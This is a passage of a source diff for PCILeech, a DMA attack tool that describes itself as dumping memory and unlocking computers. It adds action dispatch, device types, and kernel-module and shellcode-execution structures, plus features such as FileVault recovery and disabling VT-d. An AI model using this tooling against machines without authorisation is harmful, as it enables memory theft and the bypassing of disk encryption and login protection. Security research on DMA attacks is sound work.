-	if(ctx->cfg->szKMDName[0] || ctx->cfg->qwKMD) {
-		result = KMDOpen(ctx);
-		if(!result) {
-			printf("PCILEECH: Failed to load kernel module.\n");
-			PCILeechFreeContext(ctx);
-			return 1;
-		}
-	}
-	if(ctx->cfg->tpAction == DUMP) {
-		ActionMemoryDump(ctx);
-	} else if(ctx->cfg->tpAction == WRITE) {
-		ActionMemoryWrite(ctx);
-	} else if(ctx->cfg->tpAction == DISPLAY) {
-		ActionMemoryDisplay(ctx);
-	} else if(ctx->cfg->tpAction == PAGEDISPLAY) {
-		ActionMemoryPageDisplay(ctx);
-	} else if(ctx->cfg->tpAction == PATCH) {
-		ActionPatchAndSearch(ctx);
-	} else if(ctx->cfg->tpAction == SEARCH) {
-		ActionPatchAndSearch(ctx);
-	} else if(ctx->cfg->tpAction == USB3380_FLASH) {
-		Action_Device3380_Flash(ctx);
-	} else if(ctx->cfg->tpAction == USB3380_START8051) {
-		Action_Device3380_8051Start(ctx);
-	} else if(ctx->cfg->tpAction == USB3380_STOP8051) {
-		Action_Device3380_8051Stop(ctx);
-	} else if(ctx->cfg->tpAction == EXEC) {
-		ActionExecShellcode(ctx);
-	} else if(ctx->cfg->tpAction == TESTMEMREAD || ctx->cfg->tpAction == TESTMEMREADWRITE) {
-		ActionMemoryTestReadWrite(ctx);
-	} else if(ctx->cfg->tpAction == MAC_FVRECOVER) {
-		Action_MacFilevaultRecover(ctx, TRUE);
-	} else if(ctx->cfg->tpAction == PT_PHYS2VIRT) {
-		Action_PT_Phys2Virt(ctx);
-	} else if(ctx->cfg->tpAction == TLP) {
-		Action_TlpTx(ctx);
-	} else if(ctx->cfg->tpAction == PROBE) {
-		ActionMemoryProbe(ctx);
-	} else if(ctx->cfg->tpAction == MOUNT) {
-		ActionMount(ctx);
-	} else if(ctx->cfg->tpAction == KMDLOAD) {
-		if(ctx->cfg->qwKMD) {
-			printf("KMD: Successfully loaded at address: 0x%08x\n", (DWORD)ctx->cfg->qwKMD);
-		} else {
-			printf("KMD: Failed. Please supply valid -kmd and optionally -cr3 parameters.\n");
-		}
-	} else if(ctx->cfg->tpAction == KMDEXIT) {
-		KMDUnload(ctx);
-		printf("KMD: Hopefully unloaded.\n");
-	} else {
-		printf("Failed. Not yet implemented.\n");
-	}
-	if(ctx->phKMD && (ctx->cfg->tpAction != KMDLOAD) && !ctx->cfg->fAddrKMDSetByArgument) {
-		KMDUnload(ctx);
-		printf("KMD: Hopefully unloaded.\n");
-	}
-	DeviceListenTlp(ctx, ctx->cfg->dwListenTlpTimeMs);
-	PCILeechFreeContext(ctx);
-	ExitProcess(0);
-	return 0;
+    if(!result) {
+        Help_ShowGeneral();
+        PCILeechFreeContext(ctx);
+        return 1;
+    }
+    if(ctx->cfg->tpAction == EXEC) {
+        result = Util_LoadKmdExecShellcode(ctx->cfg->szShellcodeName, &pKmdExec);
+        LocalFree(pKmdExec);
+        if(!result) {
+            Help_ShowGeneral();
+            PCILeechFreeContext(ctx);
+            return 1;
+        }
+    }
+    // actions that do not require a working initialized connection to a pcileech
+    // device to start executing the command are found below:
+    if(ctx->cfg->tpAction == INFO || ctx->cfg->tpAction == MAC_FVRECOVER2 || ctx->cfg->tpAction == MAC_DISABLE_VTD || ctx->cfg->fShowHelp) {
+        if(ctx->cfg->tpAction == INFO) {
+            Help_ShowInfo();
+        } else if(ctx->cfg->tpAction == MAC_FVRECOVER2) {
+            Action_MacFilevaultRecover(ctx, FALSE);
+        } else if(ctx->cfg->tpAction == MAC_DISABLE_VTD) {
+            Action_MacDisableVtd(ctx);
+        } else if(ctx->cfg->fShowHelp) {
+            Help_ShowDetailed(ctx->cfg);
+        }
+        PCILeechFreeContext(ctx);
+        return 0;
+    }
+    result = DeviceOpen(ctx);
+    if(!result) {
+        printf("PCILEECH: Failed to connect to the device.\n");
+        PCILeechFreeContext(ctx);
+        return 1;
+    }
+    PCILeechConfigFixup(ctx); // post device config adjustments
+    if(ctx->cfg->szKMDName[0] || ctx->cfg->qwKMD) {
+        result = KMDOpen(ctx);
+        if(!result) {
+            printf("PCILEECH: Failed to load kernel module.\n");
+            PCILeechFreeContext(ctx);
+            return 1;
+        }
+    }
+    if(ctx->cfg->tpAction == DUMP) {
+        ActionMemoryDump(ctx);
+    } else if(ctx->cfg->tpAction == WRITE) {
+        ActionMemoryWrite(ctx);
+    } else if(ctx->cfg->tpAction == DISPLAY) {
+        ActionMemoryDisplay(ctx);
+    } else if(ctx->cfg->tpAction == PAGEDISPLAY) {
+        ActionMemoryPageDisplay(ctx);
+    } else if(ctx->cfg->tpAction == PATCH) {
+        ActionPatchAndSearch(ctx);
+    } else if(ctx->cfg->tpAction == SEARCH) {
+        ActionPatchAndSearch(ctx);
+    } else if(ctx->cfg->tpAction == USB3380_FLASH) {
+        Action_Device3380_Flash(ctx);
+    } else if(ctx->cfg->tpAction == USB3380_START8051) {
+        Action_Device3380_8051Start(ctx);
+    } else if(ctx->cfg->tpAction == USB3380_STOP8051) {
+        Action_Device3380_8051Stop(ctx);
+    } else if(ctx->cfg->tpAction == EXEC) {
+        ActionExecShellcode(ctx);
+    } else if(ctx->cfg->tpAction == TESTMEMREAD || ctx->cfg->tpAction == TESTMEMREADWRITE) {
+        ActionMemoryTestReadWrite(ctx);
+    } else if(ctx->cfg->tpAction == MAC_FVRECOVER) {
+        Action_MacFilevaultRecover(ctx, TRUE);
+    } else if(ctx->cfg->tpAction == PT_PHYS2VIRT) {
+        Action_PT_Phys2Virt(ctx);
+    } else if(ctx->cfg->tpAction == PT_VIRT2PHYS) {
+        Action_PT_Virt2Phys(ctx);
+    } else if(ctx->cfg->tpAction == TLP) {
+        Action_TlpTx(ctx);
+    } else if(ctx->cfg->tpAction == PROBE) {
+        ActionMemoryProbe(ctx);
+    } else if(ctx->cfg->tpAction == MOUNT) {
+        ActionMount(ctx);
+    } else if(ctx->cfg->tpAction == IDENTIFY) {
+        ActionIdentify(ctx);
+    } else if(ctx->cfg->tpAction == KMDLOAD) {
+        if(ctx->cfg->qwKMD) {
+            printf("KMD: Successfully loaded at address: 0x%08x\n", (DWORD)ctx->cfg->qwKMD);
+        } else {
+            printf("KMD: Failed. Please supply valid -kmd and optionally -cr3 parameters.\n");
+        }
+    } else if(ctx->cfg->tpAction == KMDEXIT) {
+        KMDUnload(ctx);
+        printf("KMD: Hopefully unloaded.\n");
+    } else {
+        printf("Failed. Not yet implemented.\n");
+    }
+    if(ctx->phKMD && (ctx->cfg->tpAction != KMDLOAD) && !ctx->cfg->fAddrKMDSetByArgument) {
+        KMDUnload(ctx);
+        printf("KMD: Hopefully unloaded.\n");
+    }
+    DeviceListenTlp(ctx, ctx->cfg->dwListenTlpTimeMs);
+    PCILeechFreeContext(ctx);
+    ExitProcess(0);
+    return 0;
 }
diff --git a/pcileech/pcileech.h b/pcileech/pcileech.h
index 879f734..338b0bc 100644
--- a/pcileech/pcileech.h
+++ b/pcileech/pcileech.h
@@ -1,171 +1,188 @@
 // pcileech.h : definitions for pcileech - dump memory and unlock computers with a USB3380 device using DMA.
 //
-// (c) Ulf Frisk, 2016, 2017
+// (c) Ulf Frisk, 2016-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #ifndef __PCILEECH_H__
 #define __PCILEECH_H__
 #include "oscompatibility.h"
 
-#define SIZE_PAGE_ALIGN_4K(x)				((x + 0xfff) & ~0xfff)
-#define CONFIG_MAX_SIGNATURES		        16
+#define SIZE_PAGE_ALIGN_4K(x)                ((x + 0xfff) & ~0xfff)
+#define CONFIG_MAX_SIGNATURES                16
 
 #pragma pack(push, 1) /* DISABLE STRUCT PADDINGS (REENABLE AFTER STRUCT DEFINITIONS) */
 typedef struct tdSignaturePTE {
-	WORD cPages;
-	WORD wSignature;
+    WORD cPages;
+    WORD wSignature;
 } SIGNATUREPTE, *PSIGNATUREPTE;
 #pragma pack(pop) /* RE-ENABLE STRUCT PADDINGS */
 
-typedef struct tdPCILEECH_CONTEXT		PCILEECH_CONTEXT, *PPCILEECH_CONTEXT;
+typedef struct tdPCILEECH_CONTEXT        PCILEECH_CONTEXT, *PPCILEECH_CONTEXT;
 
 typedef enum tdActionType {
-	NA,
-	INFO,
-	DUMP,
-	WRITE,
-	PATCH,
-	SEARCH,
-	USB3380_FLASH,
-	USB3380_START8051,
-	USB3380_STOP8051,
-	DISPLAY,
-	PAGEDISPLAY,
-	TESTMEMREAD,
-	TESTMEMREADWRITE,
-	KMDLOAD,
-	KMDEXIT,
-	EXEC,
-	MOUNT,
-	MAC_FVRECOVER,
-	MAC_FVRECOVER2,
-	MAC_DISABLE_VTD,
-	PT_PHYS2VIRT,
-	TLP,
-	PROBE
+    NA,
+    INFO,
+    DUMP,
+    WRITE,
+    PATCH,
+    SEARCH,
+    USB3380_FLASH,
+    USB3380_START8051,
+    USB3380_STOP8051,
+    DISPLAY,
+    PAGEDISPLAY,
+    TESTMEMREAD,
+    TESTMEMREADWRITE,
+    KMDLOAD,
+    KMDEXIT,
+    EXEC,
+    MOUNT,
+    MAC_FVRECOVER,
+    MAC_FVRECOVER2,
+    MAC_DISABLE_VTD,
+    PT_PHYS2VIRT,
+    PT_VIRT2PHYS,
+    TLP,
+    PROBE,
+    IDENTIFY
 } ACTION_TYPE;
 
 typedef enum tdPCILEECH_DEVICE_TYPE {
-	PCILEECH_DEVICE_NA,
-	PCILEECH_DEVICE_USB3380,
-	PCILEECH_DEVICE_FPGA,
-	PCILEECH_DEVICE_SP605_TCP
+    PCILEECH_DEVICE_NA,
+    PCILEECH_DEVICE_USB3380,
+    PCILEECH_DEVICE_FPGA,
+    PCILEECH_DEVICE_SP605_TCP,
+    PCILEECH_DEVICE_FILE
 } PCILEECH_DEVICE_TYPE;
 
+typedef struct tdDMA_IO_SCATTER_HEADER {
+    QWORD qwA;              // base address (DWORD boundry).
+    DWORD cbMax;            // bytes to read (DWORD boundry, max 0x1000); pbResult must have room for this.
+    DWORD cb;               // bytes read into result buffer.
+    PVOID pvReserved1;      // reserved for use by caller.
+    PVOID pvReserved2;      // reserved for use by caller.
+    PBYTE pb;               // ptr to 0x1000 sized buffer to receive read bytes.
+} DMA_IO_SCATTER_HEADER, *PDMA_IO_SCATTER_HEADER, **PPDMA_IO_SCATTER_HEADER;
+
 typedef struct tdDeviceConfig {
-	QWORD qwMaxSizeDmaIo;
-	QWORD qwAddrMaxNative;
-	PCILEECH_DEVICE_TYPE tp;
-	BOOL fPartialPageReadSupported;
-	BOOL(*pfnReadDMA)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb);
-	BOOL(*pfnWriteDMA)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _In_ PBYTE pb, _In_ DWORD cb);
-	VOID(*pfnProbeDMA)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _In_ DWORD cPages, _Inout_ __bcount(cPages) PBYTE pbResultMap);
-	BOOL(*pfnWriteTlp)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ PBYTE pb, _In_ DWORD cb);
-	BOOL(*pfnListenTlp)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ DWORD dwTime);
-	VOID(*pfnClose)(_Inout_ PPCILEECH_CONTEXT ctx);
+    QWORD qwMaxSizeDmaIo;
+    QWORD qwAddrMaxNative;
+    PCILEECH_DEVICE_TYPE tp;
+    CHAR szFileNameOptTpFile[MAX_PATH];
+    BOOL fPartialPageReadSupported;
+    BOOL fScatterReadSupported;
+    CRITICAL_SECTION LockDMA;
+    BOOL(*pfnReadDMA)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _Out_ PBYTE pb, _In_ DWORD cb);
+    VOID(*pfnReadScatterDMA)(_Inout_ PPCILEECH_CONTEXT ctx, _Inout_ PPDMA_IO_SCATTER_HEADER ppDMAs, _In_ DWORD cpDMAs, _Out_opt_ PDWORD pcpDMAsRead);
+    BOOL(*pfnWriteDMA)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _In_ PBYTE pb, _In_ DWORD cb);
+    VOID(*pfnProbeDMA)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ QWORD qwAddr, _In_ DWORD cPages, _Inout_ __bcount(cPages) PBYTE pbResultMap);
+    BOOL(*pfnWriteTlp)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ PBYTE pb, _In_ DWORD cb);
+    BOOL(*pfnListenTlp)(_Inout_ PPCILEECH_CONTEXT ctx, _In_ DWORD dwTime);
+    VOID(*pfnClose)(_Inout_ PPCILEECH_CONTEXT ctx);
 } DEVICE_CONFIG;
 
 typedef struct tdCONFIG_OPTION {
-	QWORD isValid;
-	QWORD qwValue;
+    QWORD isValid;
+    QWORD qwValue;
 } CONFIG_OPTION;
 
 typedef struct tdConfig {
-	QWORD qwAddrMin;
-	QWORD qwAddrMax;
-	QWORD qwCR3;
-	QWORD qwEFI_IBI_SYST;
-	QWORD qwKMD;
-	CHAR szFileOut[MAX_PATH];
-	PBYTE pbIn; 
-	QWORD cbIn;
-	CHAR szInS[MAX_PATH];
-	QWORD qwDataIn[10];
-	CONFIG_OPTION DeviceOpt[4];
-	ACTION_TYPE tpAction;
-	CHAR szSignatureName[MAX_PATH];
-	CHAR szKMDName[MAX_PATH];
-	CHAR szShellcodeName[MAX_PATH];
-	QWORD qwMaxSizeDmaIo;
-	DWORD dwListenTlpTimeMs;
-	DWORD TcpAddr;
-	WORD TcpPort;
-	// flags below
-	BOOL fPageTableScan;
-	BOOL fPatchAll;
-	BOOL fForceRW;
-	BOOL fShowHelp;
-	BOOL fOutFile;
-	BOOL fForceUsb2;		// USB3380
-	BOOL fForcePCIeGen1;	// FPGA
-	BOOL fVerbose;
-	BOOL fVerboseExtra;
-	BOOL fDebug;
-	BOOL fPartialPageReadSupported;
-	BOOL fAddrKMDSetByArgument;
-	// device information below
-	DEVICE_CONFIG dev;
+    QWORD qwAddrMin;
+    QWORD qwAddrMax;
+    QWORD qwCR3;
+    QWORD qwEFI_IBI_SYST;
+    QWORD qwKMD;
+    CHAR szFileOut[MAX_PATH];
+    PBYTE pbIn;
+    QWORD cbIn;
+    CHAR szInS[MAX_PATH];
+    QWORD qwDataIn[10];
+    CONFIG_OPTION DeviceOpt[4];
+    ACTION_TYPE tpAction;
+    CHAR szSignatureName[MAX_PATH];
+    CHAR szKMDName[MAX_PATH];
+    CHAR szShellcodeName[MAX_PATH];
+    QWORD qwMaxSizeDmaIo;
+    DWORD dwListenTlpTimeMs;
+    DWORD TcpAddr;
+    WORD TcpPort;
+    // flags below
+    BOOL fPageTableScan;
+    BOOL fPatchAll;
+    BOOL fForceRW;
+    BOOL fShowHelp;
+    BOOL fOutFile;
+    BOOL fForceUsb2;        // USB3380
+    BOOL fForcePCIeGen1;    // FPGA
+    BOOL fVerbose;
+    BOOL fVerboseExtra;
+    BOOL fVerboseExtraTlp;
+    BOOL fDebug;
+    BOOL fPartialPageReadSupported;
+    BOOL fAddrKMDSetByArgument;
+    // device information below
+    DEVICE_CONFIG dev;
 } CONFIG, *PCONFIG;
 
-#define SIGNATURE_CHUNK_TP_OFFSET_FIXED		0
-#define SIGNATURE_CHUNK_TP_OFFSET_RELATIVE	1
-#define SIGNATURE_CHUNK_TP_OFFSET_ANY		2
+#define SIGNATURE_CHUNK_TP_OFFSET_FIXED     0
+#define SIGNATURE_CHUNK_TP_OFFSET_RELATIVE  1
+#define SIGNATURE_CHUNK_TP_OFFSET_ANY       2
 typedef struct tdSignatureChunk {
-	QWORD qwAddress;
-	DWORD cbOffset;
-	DWORD cb;
-	BYTE tpOffset;
-	BYTE pb[4096];
+    QWORD qwAddress;
+    DWORD cbOffset;
+    DWORD cb;
+    BYTE tpOffset;
+    BYTE pb[4096];
 } SIGNATURE_CHUNK, *PSIGNATURE_CHUNK;
 
 typedef struct tdSignature {
-	// in unlock mode: 
-	//   chunk[0] = signature chunk 1 (required) 
-	//   chunk[1] = signature chunk 2 (optional)
-	//   chunk[2] = patch chunk (required)
-	//   chunk[3..5] = (not used)
-	// in kmd mode: 
-	//   chunk[0] = signature 1/page 1/SHA256(page1) (required) 
-	//   chunk[1] = signature 2/page 2/SHA256(page2) (required)
-	//   chunk[2] = shellcode 1 
-	//   chunk[3] = shellcode 2
-	//   chunk[4] = shellcode 3
-	//   chunk[5] = PTE signature (only needed in PTE mode)
-	SIGNATURE_CHUNK chunk[6];
+    // in unlock mode:
+    //   chunk[0] = signature chunk 1 (required)
+    //   chunk[1] = signature chunk 2 (optional)
+    //   chunk[2] = patch chunk (required)
+    //   chunk[3..5] = (not used)
+    // in kmd mode:
+    //   chunk[0] = signature 1/page 1/SHA256(page1) (required)
+    //   chunk[1] = signature 2/page 2/SHA256(page2) (required)
+    //   chunk[2] = shellcode 1
+    //   chunk[3] = shellcode 2
+    //   chunk[4] = shellcode 3
+    //   chunk[5] = PTE signature (only needed in PTE mode)
+    SIGNATURE_CHUNK chunk[6];
 } SIGNATURE, *PSIGNATURE;
 
 #define KMDEXEC_MAGIC 0x3cec1337
 #pragma pack(push, 1) /* DISABLE STRUCT PADDINGS (REENABLE AFTER STRUCT DEFINITIONS) */
 typedef struct tdKmdExec {
-	DWORD dwMagic;
-	BYTE pbChecksumSHA256[32];
-	QWORD qwVersion;
-	LPSTR szOutFormatPrintf;
-	QWORD cbShellcode;
-	PBYTE pbShellcode;
-	QWORD filler[4];
+    DWORD dwMagic;
+    BYTE pbChecksumSHA256[32];
+    QWORD qwVersion;
+    LPSTR szOutFormatPrintf;
+    QWORD cbShellcode;
+    PBYTE pbShellcode;
+    QWORD filler[4];
 } KMDEXEC, *PKMDEXEC;
 #pragma pack(pop) /* RE-ENABLE STRUCT PADDINGS */
 
-#define KMDDATA_OPERATING_SYSTEM_WINDOWS		0x01
-#define KMDDATA_OPERATING_SYSTEM_LINUX			0x02
-#define KMDDATA_OPERATING_SYSTEM_MACOS			0x04
-#define KMDDATA_OPERATING_SYSTEM_FREEBSD		0x08
-#define KMDDATA_OPERATING_SYSTEM_UEFI			0x10
-
-#define KMDDATA_MAGIC							0xff11337711333377
-#define KMDDATA_MAGIC_PARTIAL					0xff11337711333388
-
-#define KMD_CMD_VOID							0xffff
-#define KMD_CMD_COMPLETED						0
-#define KMD_CMD_READ							1
-#define KMD_CMD_WRITE							2
-#define KMD_CMD_TERMINATE						3
-#define KMD_CMD_MEM_INFO						4
-#define KMD_CMD_EXEC							5
-#define KMD_CMD_READ_VA							6
-#define KMD_CMD_WRITE_VA						7
-#define KMD_CMD_EXEC_EXTENDED					8
+#define KMDDATA_OPERATING_SYSTEM_WINDOWS    0x01
+#define KMDDATA_OPERATING_SYSTEM_LINUX      0x02
+#define KMDDATA_OPERATING_SYSTEM_MACOS      0x04
+#define KMDDATA_OPERATING_SYSTEM_FREEBSD    0x08
+#define KMDDATA_OPERATING_SYSTEM_UEFI       0x10
+
+#define KMDDATA_MAGIC                       0xff11337711333377
+#define KMDDATA_MAGIC_PARTIAL               0xff11337711333388
+
+#define KMD_CMD_VOID                        0xffff
+#define KMD_CMD_COMPLETED                   0
+#define KMD_CMD_READ                        1
+#define KMD_CMD_WRITE                       2
+#define KMD_CMD_TERMINATE                   3
+#define KMD_CMD_MEM_INFO                    4
+#define KMD_CMD_EXEC                        5
+#define KMD_CMD_READ_VA                     6
+#define KMD_CMD_WRITE_VA                    7
+#define KMD_CMD_EXEC_EXTENDED               8
 
 /*
 * KMD DATA struct. This struct must be contained in a 4096 byte section (page).
@@ -174,56 +191,57 @@ typedef struct tdKmdExec {
 * VNR: 003
 */
 typedef struct tdKMDDATA {
-	QWORD MAGIC;					// [0x000] magic number 0x0ff11337711333377.
-	QWORD AddrKernelBase;			// [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
-	QWORD AddrKallsymsLookupName;	// [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
-	QWORD DMASizeBuffer;			// [0x018] size of DMA buffer.
-	QWORD DMAAddrPhysical;			// [0x020] physical address of DMA buffer.
-	QWORD DMAAddrVirtual;			// [0x028] virtual address of DMA buffer.
-	QWORD _status;					// [0x030] status of operation
-	QWORD _result;					// [0x038] result of operation TRUE|FALSE
-	QWORD _address;					// [0x040] address to operate on.
-	QWORD _size;					// [0x048] size of operation / data in DMA buffer.
-	QWORD OperatingSystem;			// [0x050] operating system type
-	QWORD ReservedKMD[8];			// [0x058] reserved for specific kmd data (dependant on KMD version).
-	QWORD ReservedFutureUse1[13];	// [0x098] reserved for future use.
-	QWORD dataInExtraLength;		// [0x100] length of extra in-data.
-	QWORD dataInExtraOffset;		// [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataInExtraLengthMax;		// [0x110] maximum length of extra in-data. 
-	QWORD dataInConsoleBuffer;		// [0x118] physical address of 1-page console buffer.
-	QWORD dataIn[28];				// [0x120]
-	QWORD dataOutExtraLength;		// [0x200] length of extra out-data.
-	QWORD dataOutExtraOffset;		// [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
-	QWORD dataOutExtraLengthMax;	// [0x210] maximum length of extra out-data. 
-	QWORD dataOutConsoleBuffer;		// [0x218] physical address of 1-page console buffer.
-	QWORD dataOut[28];				// [0x220]
-	PVOID fn[32];					// [0x300] used by shellcode to store function pointers.
-	CHAR dataInStr[MAX_PATH];		// [0x400] string in-data
-	CHAR ReservedFutureUse2[252];
-	CHAR dataOutStr[MAX_PATH];		// [0x600] string out-data
-	CHAR ReservedFutureUse3[252];
-	QWORD ReservedFutureUse4[255];	// [0x800]
-	QWORD _op;						// [0xFF8] (op is last 8 bytes in 4k-page)
+    QWORD MAGIC;                    // [0x000] magic number 0x0ff11337711333377.
+    QWORD AddrKernelBase;           // [0x008] pre-filled by stage2, virtual address of kernel header (WINDOWS/MACOS).
+    QWORD AddrKallsymsLookupName;   // [0x010] pre-filled by stage2, virtual address of kallsyms_lookup_name (LINUX).
+    QWORD DMASizeBuffer;            // [0x018] size of DMA buffer.
+    QWORD DMAAddrPhysical;          // [0x020] physical address of DMA buffer.
+    QWORD DMAAddrVirtual;           // [0x028] virtual address of DMA buffer.
+    QWORD _status;                  // [0x030] status of operation
+    QWORD _result;                  // [0x038] result of operation TRUE|FALSE
+    QWORD _address;                 // [0x040] address to operate on.
+    QWORD _size;                    // [0x048] size of operation / data in DMA buffer.
+    QWORD OperatingSystem;          // [0x050] operating system type
+    QWORD ReservedKMD[8];           // [0x058] reserved for specific kmd data (dependant on KMD version).
+    QWORD ReservedFutureUse1[13];   // [0x098] reserved for future use.
+    QWORD dataInExtraLength;        // [0x100] length of extra in-data.
+    QWORD dataInExtraOffset;        // [0x108] offset from DMAAddrPhysical/DMAAddrVirtual.
+    QWORD dataInExtraLengthMax;     // [0x110] maximum length of extra in-data.
+    QWORD dataInConsoleBuffer;      // [0x118] physical address of 1-page console buffer.
+    QWORD dataIn[28];               // [0x120]
+    QWORD dataOutExtraLength;       // [0x200] length of extra out-data.
+    QWORD dataOutExtraOffset;       // [0x208] offset from DMAAddrPhysical/DMAAddrVirtual.
+    QWORD dataOutExtraLengthMax;    // [0x210] maximum length of extra out-data.
+    QWORD dataOutConsoleBuffer;     // [0x218] physical address of 1-page console buffer.
+    QWORD dataOut[28];              // [0x220]
+    PVOID fn[32];                   // [0x300] used by shellcode to store function pointers.
+    CHAR dataInStr[MAX_PATH];       // [0x400] string in-data
+    CHAR ReservedFutureUse2[252];
+    CHAR dataOutStr[MAX_PATH];      // [0x600] string out-data
+    CHAR ReservedFutureUse3[252];
+    QWORD ReservedFutureUse4[255];  // [0x800]
+    QWORD _op;                      // [0xFF8] (op is last 8 bytes in 4k-page)
 } KMDDATA, *PKMDDATA;
 
 typedef struct _PHYSICAL_MEMORY_RANGE {
-	QWORD BaseAddress;
-	QWORD NumberOfBytes;
+    QWORD BaseAddress;
+    QWORD NumberOfBytes;
 } PHYSICAL_MEMORY_RANGE, *PPHYSICAL_MEMORY_RANGE;
 
 typedef struct tdKMDHANDLE {
-	DWORD dwPageAddr32;
-	QWORD cPhysicalMap;
-	PPHYSICAL_MEMORY_RANGE pPhysicalMap;
-	PKMDDATA pk;
-	BYTE pbPageData[4096];
+    DWORD dwPageAddr32;
+    QWORD cPhysicalMap;
+    PPHYSICAL_MEMORY_RANGE pPhysicalMap;
+    PKMDDATA pk;
+    BYTE pbPageData[4096];
 } KMDHANDLE, *PKMDHANDLE;
 
 struct tdPCILEECH_CONTEXT {
-	PCONFIG cfg;
-	HANDLE hDevice;
-	PKMDHANDLE phKMD;
-	PKMDDATA pk;
+    PCONFIG cfg;
+    HANDLE hDevice;
+    HANDLE hVMM;
+    PKMDHANDLE phKMD;
+    PKMDDATA pk;
 };
 
 #endif /* __PCILEECH_H__ */
diff --git a/pcileech/pcileech.vcxproj b/pcileech/pcileech.vcxproj
index 17efa9f..8eb4ade 100644
--- a/pcileech/pcileech.vcxproj
+++ b/pcileech/pcileech.vcxproj
@@ -86,6 +86,7 @@
     <ClInclude Include="device.h" />
     <ClInclude Include="device3380.h" />
     <ClInclude Include="device605_tcp.h" />
+    <ClInclude Include="devicefile.h" />
     <ClInclude Include="devicefpga.h" />
     <ClInclude Include="dokan.h" />
     <ClInclude Include="executor.h" />
@@ -101,11 +102,15 @@
     <ClInclude Include="tlp.h" />
     <ClInclude Include="util.h" />
     <ClInclude Include="vfs.h" />
+    <ClInclude Include="vmm.h" />
+    <ClInclude Include="vmmproc.h" />
+    <ClInclude Include="vmmvfs.h" />
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="device.c" />
     <ClCompile Include="device3380.c" />
     <ClCompile Include="device605_tcp.c" />
+    <ClCompile Include="devicefile.c" />
     <ClCompile Include="devicefpga.c" />
     <ClCompile Include="executor.c" />
     <ClCompile Include="extra.c" />
@@ -119,6 +124,9 @@
     <ClCompile Include="tlp.c" />
     <ClCompile Include="util.c" />
     <ClCompile Include="vfs.c" />
+    <ClCompile Include="vmm.c" />
+    <ClCompile Include="vmmproc.c" />
+    <ClCompile Include="vmmvfs.c" />
   </ItemGroup>
   <ItemGroup>
     <None Include="Android.mk" />
diff --git a/pcileech/pcileech.vcxproj.filters b/pcileech/pcileech.vcxproj.filters
index fb262a1..ca929de 100644
--- a/pcileech/pcileech.vcxproj.filters
+++ b/pcileech/pcileech.vcxproj.filters
@@ -72,6 +72,18 @@
     <ClInclude Include="devicefpga.h">
       <Filter>Header Files</Filter>
     </ClInclude>
+    <ClInclude Include="vmm.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="vmmproc.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="vmmvfs.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
+    <ClInclude Include="devicefile.h">
+      <Filter>Header Files</Filter>
+    </ClInclude>
   </ItemGroup>
   <ItemGroup>
     <ClCompile Include="device.c">
@@ -122,6 +134,18 @@
     <ClCompile Include="devicefpga.c">
       <Filter>Source Files</Filter>
     </ClCompile>
+    <ClCompile Include="devicefile.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="vmm.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="vmmproc.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
+    <ClCompile Include="vmmvfs.c">
+      <Filter>Source Files</Filter>
+    </ClCompile>
   </ItemGroup>
   <ItemGroup>
     <None Include="Makefile">
diff --git a/pcileech/tlp.c b/pcileech/tlp.c
index f573ccd..74cc4d7 100644
--- a/pcileech/tlp.c
+++ b/pcileech/tlp.c
@@ -1,6 +1,6 @@
 // tlp.c : implementation of PCIe TLP (transaction layer packets) functionality.
 //
-// (c) Ulf Frisk, 2017
+// (c) Ulf Frisk, 2017-2018
 // Author: Ulf Frisk, pcileech@frizk.net
 //
 #include "tlp.h"
@@ -8,158 +8,181 @@
 
 VOID TLP_Print(_In_ PBYTE pbTlp, _In_ DWORD cbTlp, _In_ BOOL isTx)
 {
-	DWORD i;
-	LPSTR tp = "";
-	BYTE pb[0x1000];
-	PDWORD buf = (PDWORD)pb;
-	PTLP_HDR hdr = (PTLP_HDR)pb;
-	PTLP_HDR_CplD hdrC;
-	PTLP_HDR_MRdWr32 hdrM32;
-	PTLP_HDR_MRdWr64 hdrM64;
-	PTLP_HDR_Cfg hdrCfg;
-	if(cbTlp < 12 || cbTlp > 0x1000 || cbTlp & 0x3) { return; }
-	for(i = 0; i < cbTlp; i += 4) {
-		buf[i >> 2] = _byteswap_ulong(*(PDWORD)(pbTlp + i));
-	}
-	if((hdr->TypeFmt == TLP_Cpl) || (hdr->TypeFmt == TLP_CplD) || (hdr->TypeFmt == TLP_CplLk) || (hdr->TypeFmt == TLP_CplDLk)) {
-		if(hdr->TypeFmt == TLP_Cpl)    { tp = "Cpl:   "; }
-		if(hdr->TypeFmt == TLP_CplD)   { tp = "CplD:  "; }
-		if(hdr->TypeFmt == TLP_CplLk)  { tp = "CplLk: "; }
-		if(hdr->TypeFmt == TLP_CplDLk) { tp = "CplDLk:"; }
-		hdrC = (PTLP_HDR_CplD)pb;
-		printf(
-			"\n%s: %s Len: %03x ReqID: %04x CplID: %04x Status: %01x BC: %03x Tag: %02x LowAddr: %02x",
-			(isTx ? "TX" : "RX"),
-			tp,
-			hdr->Length,
-			hdrC->RequesterID,
-			hdrC->CompleterID,
-			hdrC->Status,
-			hdrC->ByteCount,
-			hdrC->Tag,
-			hdrC->LowerAddress
-		);
-	} else if((hdr->TypeFmt == TLP_MRd32) || (hdr->TypeFmt == TLP_MWr32)) {
-		hdrM32 = (PTLP_HDR_MRdWr32)pb;
-		printf(
